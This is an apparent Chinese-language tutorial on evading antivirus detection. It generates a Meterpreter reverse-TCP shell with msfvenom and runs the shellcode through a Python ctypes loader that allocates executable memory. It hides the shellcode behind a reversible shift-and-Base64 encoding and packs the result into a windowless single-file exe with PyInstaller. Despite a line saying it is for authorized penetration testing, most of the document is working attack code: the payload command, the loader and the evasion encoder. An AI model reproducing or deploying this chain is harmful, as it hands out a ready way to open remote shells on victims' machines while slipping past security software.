简单的免杀示例：对 msfvenom 生成的 shellcode 做可逆编码混淆，再用 PyInstaller 打包成独立 exe（这里的"加壳"实际是 PyInstaller 打包，并非传统加壳；仅用于已获授权的渗透测试）
- 在 Kali 上用 msfvenom 生成 payload（x64 架构，输出为 Python 字节串格式）
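# Generate a staged x64 reverse-TCP Meterpreter payload, emitted as a Python
# byte-string literal. GNU long options take two ASCII hyphens: the en dashes
# ("–platform", "–a") in the original paste are not parsed by msfvenom.
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.18.184 LPORT=4444 -f py -o shellcode2.py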
- 放入 Python 中执行。注意：下面的代码针对 64 位 Python 解释器——ctypes 默认把函数返回值当作 32 位 c_int，VirtualAlloc 返回的 64 位指针会被截断，因此必须显式设置 restype 为 c_uint64；32 位解释器下注释掉该行即可
# The full msfvenom output (raw x64 shellcode bytes) goes here; abbreviated in the write-up.
buf = b"\x4d\x5a\x41\x52\x55\......."
import ctypes

# Stage the raw shellcode into a fresh RWX allocation and run it on a new thread.
# This executes arbitrary bytes in-process: only run it on systems you are
# authorized to test.
shellcode = buf
shellcode = bytearray(shellcode)  # mutable copy so ctypes can build a writable view over it below

# ctypes defaults every return type to c_int (32-bit). On 64-bit Python the
# LPVOID returned by VirtualAlloc would be truncated, so declare it as 64-bit.
# Comment this line out when running under a 32-bit interpreter.
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64

# Allocate a region the size of the shellcode. 0x3000 = MEM_COMMIT | MEM_RESERVE,
# 0x40 = PAGE_EXECUTE_READWRITE (Win32 constant values); the page is both
# writable and executable for the whole lifetime of the process.
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))

# Copy the bytes into that region via a c_char array view over the bytearray.
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))

# Start a thread whose entry point is the first byte of the copied shellcode.
# NOTE(review): CreateThread's HANDLE comes back through the default c_int
# restype and is re-wrapped as c_int below; that only works while handle
# values fit in 32 bits — confirm on the target interpreter.
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))

# Block until that thread exits; -1 as a DWORD is INFINITE.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
- 连接成功
- 进行编码混淆（逐字符偏移 +5 再 Base64）。注意这只是可逆的编码，不是加密：它能打乱静态特征，但拿到脚本的人可以直接还原 payload
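import binascii, base64

# NOTE: `buf` is the raw shellcode bytes from the previous step; it is not defined here.
resv = binascii.b2a_hex(buf)  # bytes -> ASCII hex digits
src = resv.decode()


def encode(src: str) -> str:
    """Obfuscate a hex string: shift every character up by 5 code points, then base64.

    This is reversible encoding, not encryption. It changes the byte pattern so
    naive signature matching does not see the raw shellcode, but gives no
    confidentiality: the loader's decode() step undoes it with no secret.

    Args:
        src: ASCII hex representation of the payload (only 0-9/a-f are expected,
            which the +5 shift keeps within printable ASCII).

    Returns:
        The base64 text. It is also printed, as before, so it can be pasted into
        the loader script.
    """
    # str.join instead of quadratic += concatenation; the original accumulator
    # was named `re`, shadowing the stdlib module.
    shifted = "".join(chr(ord(ch) + 5) for ch in src)
    res = base64.b64encode(shifted.encode()).decode()
    print(res)
    return res


encode(src)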
- 进行解码并运行（与上一步互逆：Base64 解码、逐字符偏移 -5、再把 hex 文本还原为字节），随后复用同一段 ctypes 加载代码
import ctypes,binascii,base64

# Base64 text produced by the encode() step (placeholder in this write-up).
src = "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"


def decode(src: str) -> bytes:
    """Reverse the encode() obfuscation and return the raw shellcode bytes.

    Inverse of the encoder: base64-decode, shift every character down by
    5 code points, then parse the result as hex digits. This is plain
    reversible encoding, not encryption: anyone holding the script can
    recover the payload.

    Args:
        src: base64 string emitted by encode().

    Returns:
        The decoded shellcode bytes.

    Raises:
        binascii.Error (a ValueError subclass): on malformed base64 padding or
        when the shifted text is not an even-length hex string.
    """
    res = base64.b64decode(src).decode()
    sr = ''
    for s in res:
        new = chr(ord(s) - 5)  # undo the +5 shift applied by encode()
        sr += new
    buf = binascii.a2b_hex(sr)  # hex text -> bytes
    return buf


buf = decode(src)

# Same in-process loader as the unencoded version: allocate RWX memory, copy
# the bytes in, run them on a new thread. Only for systems you are authorized
# to test.
shellcode = buf
shellcode = bytearray(shellcode)  # mutable copy so ctypes can build a writable view over it below

# ctypes defaults every return type to c_int (32-bit); on 64-bit Python the
# LPVOID returned by VirtualAlloc would be truncated, so declare it as 64-bit.
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64

# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (Win32
# constant values): the region is writable and executable at the same time.
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))

# Copy the bytes into that region via a c_char array view over the bytearray.
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))

# Start a thread whose entry point is the first byte of the copied shellcode.
# NOTE(review): the HANDLE returned by CreateThread goes through the default
# c_int restype and is re-wrapped as c_int below; fine only while handle
# values fit in 32 bits — confirm on the target interpreter.
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))

# Block until that thread exits; -1 as a DWORD is INFINITE.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
- 使用 PyInstaller 打包为单个、不弹控制台窗口的 exe（`-F` 单文件，`-w` 无控制台）
# Bundle the loader into one console-less Windows executable
# (--onefile is the long form of -F, --windowed of -w).
pyinstaller --onefile --windowed payload.py